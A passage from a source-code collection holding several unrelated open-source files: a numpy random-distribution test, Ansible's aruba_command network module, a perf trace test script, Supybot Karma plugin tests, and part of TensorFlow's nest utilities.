mean_var_test(x, "gamma(.01,2.) random numbers", 2*100, 2*100*100)
x = chi_square(11., 10000)
mean_var_test(x, "chi squared random numbers with 11 degrees of freedom", 11, 22, 2*np.sqrt(2./11.))
x = F(5., 10., 10000)
mean_var_test(x, "F random numbers with 5 and 10 degrees of freedom", 1.25, 1.35)
x = poisson(50., 10000)
mean_var_test(x, "poisson random numbers with mean 50", 50, 50, 0.14)
print "\nEach element is the result of 16 binomial trials with probability 0.5:"
print binomial(16, 0.5, 16)
print "\nEach element is the result of 16 negative binomial trials with probability 0.5:"
print negative_binomial(16, 0.5, [16,])
print "\nEach row is the result of 16 multinomial trials with probabilities [0.1, 0.5, 0.1 0.3]:"
x = multinomial(16, [0.1, 0.5, 0.1], 8)
print x
print "Mean = ", np.sum(x,axis=0)/8.
if __name__ == '__main__':
test()
| gpl-3.0 |
lmprice/ansible | lib/ansible/modules/network/aruba/aruba_command.py | 102 | 6777 | #!/usr/bin/python
#
# Copyright: Ansible Team
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aruba_command
version_added: "2.4"
author: "James Mighion (@jmighion)"
short_description: Run commands on remote devices running Aruba Mobility Controller
description:
- Sends arbitrary commands to an aruba node and returns the results
read from the device. This module includes an
argument that will cause the module to wait for a specific condition
before returning or timing out if the condition is not met.
- This module does not support running commands in configuration mode.
Please use M(aruba_config) to configure Aruba devices.
extends_documentation_fragment: aruba
options:
commands:
description:
- List of commands to send to the remote aruba device over the
configured provider. The resulting output from the command
is returned. If the I(wait_for) argument is provided, the
module is not returned until the condition is satisfied or
the number of retries has expired.
required: true
wait_for:
description:
- List of conditions to evaluate against the output of the
command. The task will wait for each condition to be true
before moving forward. If the conditional is not true
within the configured number of retries, the task fails.
See examples.
aliases: ['waitfor']
match:
description:
- The I(match) argument is used in conjunction with the
I(wait_for) argument to specify the match policy. Valid
values are C(all) or C(any). If the value is set to C(all)
then all conditionals in the wait_for must be satisfied. If
the value is set to C(any) then only one of the values must be
satisfied.
default: all
choices: ['any', 'all']
retries:
description:
- Specifies the number of retries a command should by tried
before it is considered failed. The command is run on the
target device every retry and evaluated against the
I(wait_for) conditions.
default: 10
interval:
description:
- Configures the interval in seconds to wait between retries
of the command. If the command does not pass the specified
conditions, the interval indicates how long to wait before
trying the command again.
default: 1
"""
EXAMPLES = """
tasks:
- name: run show version on remote devices
aruba_command:
commands: show version
- name: run show version and check to see if output contains Aruba
aruba_command:
commands: show version
wait_for: result[0] contains Aruba
- name: run multiple commands on remote nodes
aruba_command:
commands:
- show version
- show interfaces
- name: run multiple commands and evaluate the output
aruba_command:
commands:
- show version
- show interfaces
wait_for:
- result[0] contains Aruba
- result[1] contains Loopback0
"""
RETURN = """
stdout:
description: The set of responses from the commands
returned: always
type: list
sample: ['...', '...']
stdout_lines:
description: The value of stdout split into a list
returned: always
type: list
sample: [['...', '...'], ['...'], ['...']]
failed_conditions:
description: The list of conditionals that have failed
returned: failed
type: list
sample: ['...', '...']
"""
import time
from ansible.module_utils.network.aruba.aruba import run_commands
from ansible.module_utils.network.aruba.aruba import aruba_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import ComplexList
from ansible.module_utils.network.common.parsing import Conditional
from ansible.module_utils.six import string_types
def to_lines(stdout):
for item in stdout:
if isinstance(item, string_types):
item = str(item).split('\n')
yield item
def parse_commands(module, warnings):
command = ComplexList(dict(
command=dict(key=True),
prompt=dict(),
answer=dict()
), module)
commands = command(module.params['commands'])
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
warnings.append(
'only show commands are supported when using check mode, not '
'executing `%s`' % item['command']
)
elif item['command'].startswith('conf'):
module.fail_json(
msg='aruba_command does not support running config mode '
'commands. Please use aruba_config instead'
)
return commands
def main():
"""main entry point for module execution
"""
argument_spec = dict(
commands=dict(type='list', required=True),
wait_for=dict(type='list', aliases=['waitfor']),
match=dict(default='all', choices=['all', 'any']),
retries=dict(default=10, type='int'),
interval=dict(default=1, type='int')
)
argument_spec.update(aruba_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
result = {'changed': False}
warnings = list()
check_args(module, warnings)
commands = parse_commands(module, warnings)
result['warnings'] = warnings
wait_for = module.params['wait_for'] or list()
conditionals = [Conditional(c) for c in wait_for]
retries = module.params['retries']
interval = module.params['interval']
match = module.params['match']
while retries > 0:
responses = run_commands(module, commands)
for item in list(conditionals):
if item(responses):
if match == 'any':
conditionals = list()
break
conditionals.remove(item)
if not conditionals:
break
time.sleep(interval)
retries -= 1
if conditionals:
failed_conditions = [item.raw for item in conditionals]
msg = 'One or more conditional statements have not been satisfied'
module.fail_json(msg=msg, failed_conditions=failed_conditions)
result.update({
'changed': False,
'stdout': responses,
'stdout_lines': list(to_lines(responses))
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
CyanogenMod/android_kernel_htc_enrc2b | tools/perf/scripts/python/check-perf-trace.py | 11214 | 2503 | # perf script event handlers, generated by perf script -g python
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# This script tests basic functionality such as flag and symbol
# strings, common_xxx() calls back into perf, begin, end, unhandled
# events, etc. Basically, if this script runs successfully and
# displays expected results, Python scripting support should be ok.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Core import *
from perf_trace_context import *
unhandled = autodict()
def trace_begin():
print "trace_begin"
pass
def trace_end():
print_unhandled()
def irq__softirq_entry(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
vec):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "vec=%s\n" % \
(symbol_str("irq__softirq_entry", "vec", vec)),
def kmem__kmalloc(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
call_site, ptr, bytes_req, bytes_alloc,
gfp_flags):
print_header(event_name, common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
print_uncommon(context)
print "call_site=%u, ptr=%u, bytes_req=%u, " \
"bytes_alloc=%u, gfp_flags=%s\n" % \
(call_site, ptr, bytes_req, bytes_alloc,
flag_str("kmem__kmalloc", "gfp_flags", gfp_flags)),
def trace_unhandled(event_name, context, event_fields_dict):
try:
unhandled[event_name] += 1
except TypeError:
unhandled[event_name] = 1
def print_header(event_name, cpu, secs, nsecs, pid, comm):
print "%-20s %5u %05u.%09u %8u %-20s " % \
(event_name, cpu, secs, nsecs, pid, comm),
# print trace fields not included in handler args
def print_uncommon(context):
print "common_preempt_count=%d, common_flags=%s, common_lock_depth=%d, " \
% (common_pc(context), trace_flag_str(common_flags(context)), \
common_lock_depth(context))
def print_unhandled():
keys = unhandled.keys()
if not keys:
return
print "\nunhandled events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for event_name in keys:
print "%-40s %10d\n" % (event_name, unhandled[event_name])
| gpl-2.0 |
haxwithaxe/supybot | plugins/Karma/test.py | 14 | 9913 | ###
# Copyright (c) 2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
from supybot.test import *
try:
import sqlite
except ImportError:
sqlite = None
if sqlite is not None:
class KarmaTestCase(ChannelPluginTestCase):
plugins = ('Karma',)
def testKarma(self):
self.assertError('karma')
self.assertRegexp('karma foobar', 'neutral karma')
try:
conf.replyWhenNotCommand = True
self.assertNoResponse('foobar++', 2)
finally:
conf.replyWhenNotCommand = False
self.assertRegexp('karma foobar', 'increased 1.*total.*1')
self.assertRegexp('karma FOOBAR', 'increased 1.*total.*1')
self.assertNoResponse('foobar--', 2)
self.assertRegexp('karma foobar', 'decreased 1.*total.*0')
self.assertRegexp('karma FOOBAR', 'decreased 1.*total.*0')
self.assertNoResponse('FOO++', 2)
self.assertNoResponse('BAR--', 2)
self.assertRegexp('karma foo bar foobar', '.*foo.*foobar.*bar.*')
self.assertRegexp('karma FOO BAR FOOBAR', '.*foo.*foobar.*bar.*')
self.assertRegexp('karma FOO BAR FOOBAR',
'.*FOO.*foobar.*BAR.*', flags=0)
self.assertRegexp('karma foo bar foobar asdfjkl', 'asdfjkl')
# Test case-insensitive
self.assertNoResponse('MOO++', 2)
self.assertRegexp('karma moo',
'Karma for [\'"]moo[\'"].*increased 1.*total.*1')
self.assertRegexp('karma MoO',
'Karma for [\'"]MoO[\'"].*increased 1.*total.*1')
def testKarmaRankingDisplayConfigurable(self):
try:
orig = conf.supybot.plugins.Karma.response()
conf.supybot.plugins.Karma.response.setValue(True)
original = conf.supybot.plugins.Karma.rankingDisplay()
self.assertNotError('foo++')
self.assertNotError('foo++')
self.assertNotError('foo++')
self.assertNotError('foo++')
self.assertNotError('bar++')
self.assertNotError('bar++')
self.assertNotError('bar++')
self.assertNotError('baz++')
self.assertNotError('baz++')
self.assertNotError('quux++')
self.assertNotError('xuuq--')
self.assertNotError('zab--')
self.assertNotError('zab--')
self.assertNotError('rab--')
self.assertNotError('rab--')
self.assertNotError('rab--')
self.assertNotError('oof--')
self.assertNotError('oof--')
self.assertNotError('oof--')
self.assertNotError('oof--')
self.assertRegexp('karma', 'foo.*bar.*baz.*oof.*rab.*zab')
conf.supybot.plugins.Karma.rankingDisplay.setValue(4)
self.assertRegexp('karma', 'foo.*bar.*baz.*quux')
finally:
conf.supybot.plugins.Karma.response.setValue(orig)
conf.supybot.plugins.Karma.rankingDisplay.setValue(original)
def testMost(self):
self.assertError('most increased')
self.assertError('most decreased')
self.assertError('most active')
self.assertHelp('most aldsfkj')
self.assertNoResponse('foo++', 1)
self.assertNoResponse('foo++', 1)
self.assertNoResponse('bar++', 1)
self.assertNoResponse('bar--', 1)
self.assertNoResponse('bar--', 1)
self.assertRegexp('karma most active', 'bar.*foo')
self.assertRegexp('karma most increased', 'foo.*bar')
self.assertRegexp('karma most decreased', 'bar.*foo')
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
self.assertRegexp('karma most active', 'foo.*bar')
self.assertRegexp('karma most increased', 'foo.*bar')
self.assertRegexp('karma most decreased', 'foo.*bar')
def testSimpleOutput(self):
try:
orig = conf.supybot.plugins.Karma.simpleOutput()
conf.supybot.plugins.Karma.simpleOutput.setValue(True)
self.assertNoResponse('foo++', 2)
self.assertResponse('karma foo', 'foo: 1')
self.assertNoResponse('bar--', 2)
self.assertResponse('karma bar', 'bar: -1')
finally:
conf.supybot.plugins.Karma.simpleOutput.setValue(orig)
def testSelfRating(self):
nick = self.nick
try:
orig = conf.supybot.plugins.Karma.allowSelfRating()
conf.supybot.plugins.Karma.allowSelfRating.setValue(False)
self.assertError('%s++' % nick)
self.assertResponse('karma %s' % nick,
'%s has neutral karma.' % nick)
conf.supybot.plugins.Karma.allowSelfRating.setValue(True)
self.assertNoResponse('%s++' % nick, 2)
self.assertRegexp('karma %s' % nick,
'Karma for [\'"]%s[\'"].*increased 1.*total.*1' % nick)
finally:
conf.supybot.plugins.Karma.allowSelfRating.setValue(orig)
def testKarmaOutputConfigurable(self):
self.assertNoResponse('foo++', 2)
try:
orig = conf.supybot.plugins.Karma.response()
conf.supybot.plugins.Karma.response.setValue(True)
self.assertNotError('foo++')
finally:
conf.supybot.plugins.Karma.response.setValue(orig)
def testKarmaMostDisplayConfigurable(self):
self.assertNoResponse('foo++', 1)
self.assertNoResponse('foo++', 1)
self.assertNoResponse('bar++', 1)
self.assertNoResponse('bar--', 1)
self.assertNoResponse('bar--', 1)
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
self.assertNoResponse('foo--', 1)
try:
orig = conf.supybot.plugins.Karma.mostDisplay()
conf.supybot.plugins.Karma.mostDisplay.setValue(1)
self.assertRegexp('karma most active', '(?!bar)')
conf.supybot.plugins.Karma.mostDisplay.setValue(25)
self.assertRegexp('karma most active', 'bar')
finally:
conf.supybot.plugins.Karma.mostDisplay.setValue(orig)
def testIncreaseKarmaWithNickNotCallingInvalidCommand(self):
self.assertSnarfNoResponse('%s: foo++' % self.irc.nick, 3)
def testClear(self):
self.assertNoResponse('foo++', 1)
self.assertRegexp('karma foo', '1')
self.assertNotError('karma clear foo')
self.assertRegexp('karma foo', '0')
self.assertNotRegexp('karma foo', '1')
# def testNoKarmaDunno(self):
# self.assertNotError('load Infobot')
# self.assertNoResponse('foo++')
def testMultiWordKarma(self):
self.assertNoResponse('(foo bar)++', 1)
self.assertRegexp('karma "foo bar"', '1')
def testUnaddressedKarma(self):
karma = conf.supybot.plugins.Karma
resp = karma.response()
unaddressed = karma.allowUnaddressedKarma()
try:
karma.response.setValue(True)
karma.allowUnaddressedKarma.setValue(True)
for m in ('++', '--'):
self.assertRegexp('foo%s' % m, 'operation')
self.assertSnarfRegexp('foo%s' % m, 'operation')
#self.assertNoResponse('foo bar%s' % m)
#self.assertSnarfNoResponse('foo bar%s' % m)
self.assertRegexp('(foo bar)%s' % m, 'operation')
self.assertSnarfRegexp('(foo bar)%s' % m, 'operation')
finally:
karma.response.setValue(resp)
karma.allowUnaddressedKarma.setValue(unaddressed)
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| bsd-3-clause |
dancingdan/tensorflow | tensorflow/python/util/nest.py | 6 | 30946 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""## Functions for working with arbitrarily nested sequences of elements.
This module can perform operations on nested structures. A nested structure is a
Python sequence, tuple (including `namedtuple`), or dict that can contain
further sequences, tuples, and dicts.
attr.s decorated classes (http://www.attrs.org) are also supported, in the
same way as `namedtuple`.
The utilities here assume (and do not check) that the nested structures form a
'tree', i.e., no references in the structure of the input of these functions
should be recursive.
Example structures: `((3, 4), 5, (6, 7, (9, 10), 8))`, `(np.array(0),
(np.array([3, 4]), tf.constant([3, 4])))`
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, "__attrs_attrs__")
return [getattr(obj, a.name) for a in attrs]
def _sorted(dict_):
"""Returns a sorted list of the dict keys, with error if keys not sortable."""
try:
return sorted(_six.iterkeys(dict_))
except TypeError:
raise TypeError("nest only supports dicts with sortable keys.")
def _is_namedtuple(instance, strict=False):
"""Returns True iff `instance` is a `namedtuple`.
Args:
instance: An instance of a Python object.
strict: If True, `instance` is considered to be a `namedtuple` only if
it is a "plain" namedtuple. For instance, a class inheriting
from a `namedtuple` will be considered to be a `namedtuple`
iff `strict=False`.
Returns:
True if `instance` is a `namedtuple`.
"""
return _pywrap_tensorflow.IsNamedtuple(instance, strict)
# See the swig file (util.i) for documentation.
_is_mapping = _pywrap_tensorflow.IsMapping
_is_attrs = _pywrap_tensorflow.IsAttrs
def _sequence_like(instance, args):
"""Converts the sequence `args` to the same type as `instance`.
Args:
instance: an instance of `tuple`, `list`, `namedtuple`, `dict`, or
`collections.OrderedDict`.
args: elements to be converted to the `instance` type.
Returns:
`args` with the type of `instance`.
"""
if _is_mapping(instance):
# Pack dictionaries in a deterministic order by sorting the keys.
# Notice this means that we ignore the original order of `OrderedDict`
# instances. This is intentional, to avoid potential bugs caused by mixing
# ordered and plain dicts (e.g., flattening a dict but using a
# corresponding `OrderedDict` to pack it back).
result = dict(zip(_sorted(instance), args))
return type(instance)((key, result[key]) for key in _six.iterkeys(instance))
elif _is_namedtuple(instance) or _is_attrs(instance):
return type(instance)(*args)
else:
# Not a namedtuple
return type(instance)(args)
def _yield_value(iterable):
"""Yields the next value from the given iterable."""
if _is_mapping(iterable):
# Iterate through dictionaries in a deterministic order by sorting the
# keys. Notice this means that we ignore the original order of `OrderedDict`
# instances. This is intentional, to avoid potential bugs caused by mixing
# ordered and plain dicts (e.g., flattening a dict but using a
# corresponding `OrderedDict` to pack it back).
for key in _sorted(iterable):
yield iterable[key]
elif _is_attrs(iterable):
for value in _get_attrs_values(iterable):
yield value
else:
for value in iterable:
yield value
# See the swig file (util.i) for documentation.
is_sequence = _pywrap_tensorflow.IsSequence
# See the swig file (util.i) for documentation.
flatten = _pywrap_tensorflow.Flatten
# See the swig file (util.i) for documentation.
_same_namedtuples = _pywrap_tensorflow.SameNamedtuples
class _DotString(object):
def __str__(self):
return "."
def __repr__(self):
return "."
_DOT = _DotString()
def assert_same_structure(nest1, nest2, check_types=True):
"""Asserts that two structures are nested in the same way.
Note that namedtuples with identical name and fields are always considered
to have the same shallow structure (even with `check_types=True`).
For intance, this code will print `True`:
```python
def nt(a, b):
return collections.namedtuple('foo', 'a b')(a, b)
print(assert_same_structure(nt(0, 1), nt(2, 3)))
```
Args:
nest1: an arbitrarily nested structure.
nest2: an arbitrarily nested structure.
check_types: if `True` (default) types of sequences are checked as well,
including the keys of dictionaries. If set to `False`, for example a
list and a tuple of objects will look the same if they have the same
size. Note that namedtuples with identical name and fields are always
considered to have the same shallow structure. Two types will also be
considered the same if they are both list subtypes (which allows "list"
and "_ListWrapper" from checkpointable dependency tracking to compare
equal).
Raises:
ValueError: If the two structures do not have the same number of elements or
if the two structures are not nested in the same way.
TypeError: If the two structures differ in the type of sequence in any of
their substructures. Only possible if `check_types` is `True`.
"""
try:
_pywrap_tensorflow.AssertSameStructure(nest1, nest2, check_types)
except (ValueError, TypeError) as e:
str1 = str(map_structure(lambda _: _DOT, nest1))
str2 = str(map_structure(lambda _: _DOT, nest2))
raise type(e)("%s\n"
"Entire first structure:\n%s\n"
"Entire second structure:\n%s"
% (str(e), str1, str2))
def flatten_dict_items(dictionary):
"""Returns a dictionary with flattened keys and values.
This function flattens the keys and values of a dictionary, which can be
arbitrarily nested structures, and returns the flattened version of such
structures:
```python
example_dictionary = {(4, 5, (6, 8)): ("a", "b", ("c", "d"))}
result = {4: "a", 5: "b", 6: "c", 8: "d"}
flatten_dict_items(example_dictionary) == result
```
The input dictionary must satisfy two properties:
1. Its keys and values should have the same exact nested structure.
2. The set of all flattened keys of the dictionary must not contain repeated
keys.
Args:
dictionary: the dictionary to zip
Returns:
The zipped dictionary.
Raises:
TypeError: If the input is not a dictionary.
ValueError: If any key and value have not the same structure, or if keys are
not unique.
"""
if not isinstance(dictionary, (dict, _collections.Mapping)):
raise TypeError("input must be a dictionary")
flat_dictionary = {}
for i, v in _six.iteritems(dictionary):
if not is_sequence(i):
if i in flat_dictionary:
raise ValueError(
"Could not flatten dictionary: key %s is not unique." % i)
flat_dictionary[i] = v
else:
flat_i = flatten(i)
flat_v = flatten(v)
if len(flat_i) != len(flat_v):
raise ValueError(
"Could not flatten dictionary. Key had %d elements, but value had "
"%d elements. Key: %s, value: %s."
% (len(flat_i), len(flat_v), flat_i, flat_v))
for new_i, new_v in zip(flat_i, flat_v):
if new_i in flat_dictionary:
raise ValueError(
"Could not flatten dictionary: key %s is not unique."
% (new_i))
flat_dictionary[new_i] = new_v
return flat_dictionary
def _packed_nest_with_indices(structure, flat, index):
"""Helper function for pack_sequence_as.
Args:
structure: Substructure (list / tuple / dict) to mimic.
flat: Flattened values to output substructure for.
index: Index at which to start reading from flat.
Returns:
The tuple (new_index, child), where:
* new_index - the updated index into `flat` having processed `structure`.
* packed - the subset of `flat` corresponding to `structure`,
having started at `index`, and packed into the same nested
format.
Raises:
ValueError: if `structure` contains more elements than `flat`
(assuming indexing starts from `index`).
"""
packed = []
for s in _yield_value(structure):
if is_sequence(s):
new_index, child = _packed_nest_with_indices(s, flat, index)
packed.append(_sequence_like(s, child))
index = new_index
else:
packed.append(flat[index])
index += 1
return index, packed
def pack_sequence_as(structure, flat_sequence):
"""Returns a given flattened sequence packed into a given structure.
If `structure` is a scalar, `flat_sequence` must be a single-element list;
in this case the return value is `flat_sequence[0]`.
If `structure` is or contains a dict instance, the keys will be sorted to
pack the flat sequence in deterministic order. This is true also for
`OrderedDict` instances: their sequence order is ignored, the sorting order of
keys is used instead. The same convention is followed in `flatten`.
This correctly repacks dicts and `OrderedDict`s after they have been
flattened, and also allows flattening an `OrderedDict` and then repacking it
back using a corresponding plain dict, or vice-versa.
Dictionaries with non-sortable keys cannot be flattened.
Args:
structure: Nested structure, whose structure is given by nested lists,
tuples, and dicts. Note: numpy arrays and strings are considered
scalars.
flat_sequence: flat sequence to pack.
Returns:
packed: `flat_sequence` converted to have the same recursive structure as
`structure`.
Raises:
ValueError: If `flat_sequence` and `structure` have different
element counts.
TypeError: `structure` is or contains a dict with non-sortable keys.
"""
if not is_sequence(flat_sequence):
raise TypeError("flat_sequence must be a sequence")
if not is_sequence(structure):
if len(flat_sequence) != 1:
raise ValueError("Structure is a scalar but len(flat_sequence) == %d > 1"
% len(flat_sequence))
return flat_sequence[0]
try:
final_index, packed = _packed_nest_with_indices(structure, flat_sequence, 0)
if final_index < len(flat_sequence):
raise IndexError
except IndexError:
flat_structure = flatten(structure)
if len(flat_structure) != len(flat_sequence):
raise ValueError(
"Could not pack sequence. Structure had %d elements, but "
"flat_sequence had %d elements. Structure: %s, flat_sequence: %s." %
(len(flat_structure), len(flat_sequence), structure, flat_sequence))
return _sequence_like(structure, packed)
def map_structure(func, *structure, **check_types_dict):
"""Applies `func` to each entry in `structure` and returns a new structure.
Applies `func(x[0], x[1], ...)` where x[i] is an entry in
`structure[i]`. All structures in `structure` must have the same arity,
and the return value will contain the results in the same structure.
Args:
func: A callable that accepts as many arguments as there are structures.
*structure: scalar, or tuple or list of constructed scalars and/or other
tuples/lists, or scalars. Note: numpy arrays are considered as scalars.
**check_types_dict: only valid keyword argument is `check_types`. If set to
`True` (default) the types of iterables within the structures have to be
same (e.g. `map_structure(func, [1], (1,))` raises a `TypeError`
exception). To allow this set this argument to `False`.
Note that namedtuples with identical name and fields are always
considered to have the same shallow structure.
Returns:
A new structure with the same arity as `structure`, whose values correspond
to `func(x[0], x[1], ...)` where `x[i]` is a value in the corresponding
location in `structure[i]`. If there are different sequence types and
`check_types` is `False` the sequence types of the first structure will be
used.
Raises:
TypeError: If `func` is not callable or if the structures do not match
each other by depth tree.
ValueError: If no structure is provided or if the structures do not match
each other by type.
ValueError: If wrong keyword arguments are provided.
"""
if not callable(func):
raise TypeError("func must be callable, got: %s" % func)
if not structure:
raise ValueError("Must provide at least one structure")
if check_types_dict:
if "check_types" not in check_types_dict or len(check_types_dict) > 1:
raise ValueError("Only valid keyword argument is check_types")
check_types = check_types_dict["check_types"]
else:
check_types = True
for other in structure[1:]:
assert_same_structure(structure[0], other, check_types=check_types)
flat_structure = [flatten(s) for s in structure]
entries = zip(*flat_structure)
return pack_sequence_as(
structure[0], [func(*x) for x in entries])
def map_structure_with_paths(func, *structure, **kwargs):
"""Applies `func` to each entry in `structure` and returns a new structure.
Applies `func(path, x[0], x[1], ..., **kwargs)` where x[i] is an entry in
`structure[i]` and `path` is the common path to x[i] in the structures. All
structures in `structure` must have the same arity, and the return value will
contain the results in the same structure. Special kwarg `check_types`
determines whether the types of iterables within the structure must be the
same-- see **kwargs definition below.
Args:
func: A callable with the signature func(path, *values, **kwargs) that is
evaluated on the leaves of the structure.
*structure: A variable number of compatible structures to process.
**kwargs: Optional kwargs to be passed through to func. Special kwarg
`check_types` is not passed to func, but instead determines whether the
types of iterables within the structures have to be same (e.g.,
`map_structure(func, [1], (1,))` raises a `TypeError` exception). By
default, the types must match. To allow iteration over structures of
different types (but common arity), set this kwarg to `False`.
Returns:
A structure of the same form as the input structures whose leaves are the
result of evaluating func on corresponding leaves of the input structures.
Raises:
TypeError: If `func` is not callable or if the structures do not match
each other by depth tree.
TypeError: If `check_types` is not `False` and the two structures differ in
the type of sequence in any of their substructures.
ValueError: If no structures are provided.
"""
if not callable(func):
raise TypeError("func must be callable, got: %s" % func)
if not structure:
raise ValueError("Must provide at least one structure")
check_types = kwargs.pop("check_types", True)
for other in structure[1:]:
assert_same_structure(structure[0], other, check_types=check_types)
# First set paths_and_values to:
# [[(p11, v11), ... (p1n, v1n)], ... [(pm1, vm1), ... (pmn, vmn)]]
paths_and_values = [flatten_with_joined_string_paths(s) for s in structure]
# Now zip(*paths_and_values) would be:
# [((p11, v11), ... (pm1, vm1)), ... ((p1n, v1n), ... (pmn, vmn))]
# so grouped_by_path is set to:
# [[(p11, ... pm1), (v11, ... vm1)], ... [(p1n, ... pmn), (v1n, ... vmn)]]
# Note that p1i, ... pmi must all be equal since the structures are the same.
grouped_by_path = [zip(*p_v) for p_v in zip(*paths_and_values)]
return pack_sequence_as(structure[0], [
func(paths[0], *values, **kwargs) for paths, values in grouped_by_path])
def _yield_flat_up_to(shallow_tree, input_tree):
"""Yields elements `input_tree` partially flattened up to `shallow_tree`."""
if is_sequence(shallow_tree):
for shallow_branch, input_branch in zip(_yield_value(shallow_tree),
_yield_value(input_tree)):
for input_leaf in _yield_flat_up_to(shallow_branch, input_branch):
yield input_leaf
else:
yield input_tree
def assert_shallow_structure(shallow_tree, input_tree, check_types=True):
"""Asserts that `shallow_tree` is a shallow structure of `input_tree`.
That is, this function tests if the `input_tree` structure can be created from
the `shallow_tree` structure by replacing its leaf nodes with deeper
tree structures.
Examples:
The following code will raise an exception:
```python
shallow_tree = ["a", "b"]
input_tree = ["c", ["d", "e"], "f"]
assert_shallow_structure(shallow_tree, input_tree)
```
The following code will not raise an exception:
```python
shallow_tree = ["a", "b"]
input_tree = ["c", ["d", "e"]]
assert_shallow_structure(shallow_tree, input_tree)
```
Args:
shallow_tree: an arbitrarily nested structure.
input_tree: an arbitrarily nested structure.
check_types: if `True` (default) the sequence types of `shallow_tree` and
`input_tree` have to be the same. Note that even with check_types==True,
this function will consider two different namedtuple classes with the same
name and _fields attribute to be the same class.
Raises:
TypeError: If `shallow_tree` is a sequence but `input_tree` is not.
TypeError: If the sequence types of `shallow_tree` are different from
`input_tree`. Only raised if `check_types` is `True`.
ValueError: If the sequence lengths of `shallow_tree` are different from
`input_tree`.
"""
if is_sequence(shallow_tree):
if not is_sequence(input_tree):
raise TypeError(
"If shallow structure is a sequence, input must also be a sequence. "
"Input has type: %s." % type(input_tree))
if check_types and not isinstance(input_tree, type(shallow_tree)):
# Duck-typing means that nest should be fine with two different
# namedtuples with identical name and fields.
shallow_is_namedtuple = _is_namedtuple(shallow_tree, False)
input_is_namedtuple = _is_namedtuple(input_tree, False)
if shallow_is_namedtuple and input_is_namedtuple:
if not _same_namedtuples(shallow_tree, input_tree):
raise TypeError(
"The two namedtuples don't have the same sequence type. Input "
"structure has type %s, while shallow structure has type %s."
% (type(input_tree), type(shallow_tree)))
else:
raise TypeError(
"The two structures don't have the same sequence type. Input "
"structure has type %s, while shallow structure has type %s."
% (type(input_tree), type(shallow_tree)))
if len(input_tree) != len(shallow_tree):
raise ValueError(
"The two structures don't have the same sequence length. Input "
"structure has length %s, while shallow structure has length %s."
% (len(input_tree), len(shallow_tree)))
if check_types and isinstance(shallow_tree, (dict, _collections.Mapping)):
if set(input_tree) != set(shallow_tree):
raise ValueError(
"The two structures don't have the same keys. Input "
"structure has keys %s, while shallow structure has keys %s." %
(list(_six.iterkeys(input_tree)),
list(_six.iterkeys(shallow_tree))))
input_tree = list(sorted(_six.iteritems(input_tree)))
shallow_tree = list(sorted(_six.iteritems(shallow_tree)))
for shallow_branch, input_branch in zip(shallow_tree, input_tree):
assert_shallow_structure(shallow_branch, input_branch,
check_types=check_types)
def flatten_up_to(shallow_tree, input_tree):
"""Flattens `input_tree` up to `shallow_tree`.
Any further depth in structure in `input_tree` is retained as elements in the
partially flatten output.
If `shallow_tree` and `input_tree` are not sequences, this returns a
